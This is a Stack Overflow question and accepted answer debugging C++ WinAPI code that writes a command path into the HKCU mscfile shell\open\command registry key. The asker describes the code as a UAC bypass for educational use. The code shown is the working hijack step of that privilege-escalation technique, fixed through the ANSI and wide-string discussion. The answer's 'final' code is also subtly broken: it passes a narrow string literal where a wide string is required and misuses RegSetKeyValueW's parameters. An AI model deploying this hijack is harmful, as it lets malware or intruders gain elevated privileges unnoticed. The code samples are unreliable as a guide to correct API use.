# Writing to registry failing, no data added to key, yet functions returning ERROR_SUCCESS

Tags: c++, winapi, registry

I am writing a method to add data to registry key using `RegSetValueEx()` after checking the registry the value has not been written to the key. All 3 functions I use to load the hive, key and add value are returning `ERROR_SUCCESS` which has got me stumped. I have read [this](https://stackoverflow.com/questions/820846/regopenkeyex-fails-on-hkey-local-machine) and [this](https://stackoverflow.com/questions/48428728/writing-reading-to-windows-registry-with-windows-api), however both of these questions suggest I should be receiving an error if I were coming across these problems.

I feel I am missing something to do with wide strings, ANSI and Unicode, although I cannot understand what. I could be way off base here though. I will also add that Visual Studio is running as Admin.

This is the code I have written so far:

```
#include <iostream>
#include <Windows.h>

int addValuetoRegistryKey(std::string executable) {

    LPCWSTR registryKey = L"Software\\Classes\\mscfile\\shell\\open\\command\\";
    HKEY hiveHandle;
    HKEY keyHandle;

    if (RegOpenCurrentUser(KEY_SET_VALUE, &hiveHandle) != ERROR_SUCCESS) {

        wchar_t buf[256];
        FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
            NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
            buf, (sizeof(buf) / sizeof(wchar_t)), NULL);

        /* Display error */
        std::wcout << "Opening hive failed: " << buf << std::endl;

        return -1;

    }
    else {

        std::wcout << "HKCU Hive opened successfully" << std::endl;

    }

    if (RegOpenKeyEx(hiveHandle, registryKey, 0, KEY_SET_VALUE, &keyHandle) != ERROR_SUCCESS) {

        wchar_t buf[256];
        FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
            NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
            buf, (sizeof(buf) / sizeof(wchar_t)), NULL);

        /* Display error */
        std::wcout << "Opening key failed: " << buf << std::endl;

        return -1;

    }
    else {

        std::wcout << registryKey << " opened successfully" << std::endl;

    }

    if (RegSetValueEx(keyHandle, NULL, 0, REG_SZ, (LPCBYTE)executable.c_str(), executable.size() + 1) != ERROR_SUCCESS) {

        wchar_t buf[256];
        FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
            NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
            buf, (sizeof(buf) / sizeof(wchar_t)), NULL);

        /* Display error */
        std::wcout << "Writing value to  key failed: " << buf << std::endl;

        return -1;
    }
    else {

        std::wcout << executable.c_str() << " written to key" << std::endl;

    }

    RegCloseKey(keyHandle);
    RegCloseKey(hiveHandle);

    return 0;
}

int main() {

    addValuetoRegistryKey("C:\\Windows\\System32\\cmd.exe");

}
```

**Full disclosure:** I am a computer security graduate, and some users may notice that I am trying to implement a method for UAC bypass. This is simply for educational purposes, instead of implementing metasploit modules, I would like to write the code and understand the workflow myself.

This is the data returned to the console:
[image]

Comment: Is this a case of [Registry Virtualization](https://learn.microsoft.com/en-us/windows/win32/sysinfo/registry-virtualization)?

Comment: `LPCWSTR registryKey = L"Soft...` This indicates you are compiling for Unicode. `(LPCBYTE)executable.c_str()` But this is sending an ANSI string to the wide version `RegSetValueExW`.

Comment: @dxiv OK. I can look into that, a little bit of a gap in my knowlege. Should it not fail if that were the case though?

Comment: @IInspectable, I am reading that document now, although I feel that as an Administrator, the write should be successful. It works from a command prompt using reg add. Still, I will read further into this, Thanks.

Comment: @RandomHash The function will trust that what you are sending is a wide string, since it has no independent means to verify that. So the call won't fail, but it won't write what you expected, either.

Comment: @dxiv Got it. Could you recommend a good resource explaining the differences between the ANSI and Unicode versions of these methods, and how to correctly supply data to these? I am looking myself also. I understand that ANSI and Unicode are different encoding methods, but in the context of C++ and the WinAPI, I must admit my knowledge fails me.

Comment: Strangely, when using the RegSetKeyValueA function, as suggested in the Microsoft Docs, the value is written to the registry. Although the value actually becomes C:\Windows\SysWow64\cmd.exe. It still has the required affect, although I will have to test this on an x86 system to see if it works there also. I still feel as if I am missing something with regard to ANSI and Unicode differences though.

Comment: @RandomHash You can find some starting points at [1](https://learn.microsoft.com/en-us/windows/win32/learnwin32/working-with-strings), [2](https://stackoverflow.com/questions/4592261/windows-api-ansi-and-wide-character-strings-is-it-utf8-or-ascii-utf-16-or-u).

Answer (score 1, accepted):

Thanks for dxiv for pointing me toward the right resources.

Firstly, after reading the Microsoft information, I decided to change all strings to wide strings, as ANSI no longer needs to be supported in new applications, or when **NOT** taking user input.

`std::string executable` to `LPCWSTR executable`,

`std::wcout << executable.c_str() << " written to key" << std::endl;` to `std::wcout << executable << " written to key" << std::endl;`

`addValuetoRegistryKey("C:\\Windows\\System32\\cmd.exe");` to `addValuetoRegistryKey(L"C:\\Windows\\System32\\cmd.exe");`

Next I chose to use the specific wide character implementation of `RegSetValueEx`, `RegSetValueExW`.

Using `(wcslen(executable) + 1) * sizeof(wchar_t)` to calculate the length of executable for the final parameter.

The final code is below:

```
#include <iostream>
#include <Windows.h>

int addValuetoRegistryKey(LPCWSTR executable) {

    LPCWSTR registryKey = L"Software\\Classes\\mscfile\\shell\\open\\command\\";
    HKEY hiveHandle;
    HKEY keyHandle;

    if (RegOpenCurrentUser(KEY_SET_VALUE, &hiveHandle) != ERROR_SUCCESS) {

        wchar_t buf[256];
        FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
            NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
            buf, (sizeof(buf) / sizeof(wchar_t)), NULL);

        /* Display error */
        std::wcout << "Opening hive failed: " << buf << std::endl; 

        return -1;

    }
    else {

        std::wcout << "HKCU Hive opened successfully" << std::endl;

    }

    if (RegOpenKeyEx(hiveHandle, registryKey, 0, KEY_SET_VALUE, &keyHandle) != ERROR_SUCCESS) {

        wchar_t buf[256];
        FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
            NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
            buf, (sizeof(buf) / sizeof(wchar_t)), NULL);

        /* Display error */
        std::wcout << "Opening key failed: " << buf << std::endl;

        return -1;

    }
    else {

        std::wcout << registryKey << " opened successfully" << std::endl;

    }


    if (RegSetValueExW(keyHandle, NULL, 0, REG_SZ, (LPCBYTE) executable, (wcslen(executable) + 1) * sizeof(wchar_t)) != ERROR_SUCCESS) {

        wchar_t buf[256];
        FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
            NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
            buf, (sizeof(buf) / sizeof(wchar_t)), NULL);

        /* Display error */
        std::wcout << "Writing value to  key failed: " << buf << std::endl;

        return -1;
    }
    else {

        std::wcout << executable << " written to key" << std::endl;

    }

    RegCloseKey(keyHandle);
    RegCloseKey(hiveHandle);

    return 0;


}

int main() {

    addValuetoRegistryKey("C:\\Windows\\System32\\cmd.exe");

}
```

The value is now written to the registry correctly. Upon reading more of the Microsoft docs, the function `RegSetKeyValueW` was suggested. I have implemented this method, however, I wanted to work out how to do this correctly, and post here.

For anyone who stumbles upon this question, and would like an example of how to implement the `RegSetKeyValueW` function, you can find the code below:

```
if (RegSetKeyValueW(keyHandle, NULL, 0, REG_SZ, executable, (wcslen(executable) + 1) * sizeof(wchar_t)) != ERROR_SUCCESS) {

        wchar_t buf[256];
        FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
            NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
            buf, (sizeof(buf) / sizeof(wchar_t)), NULL);

        /* Display error */
        std::wcout << "Writing value to  key failed: " << buf << std::endl;

        return -1;
    }
    else {

        std::wcout << executable << " written to key" << std::endl;

    }
```

Comment: `wcslen(executable) * sizeof(wchar_t) + 1` to `(wcslen(executable) + 1) * sizeof(wchar_t)`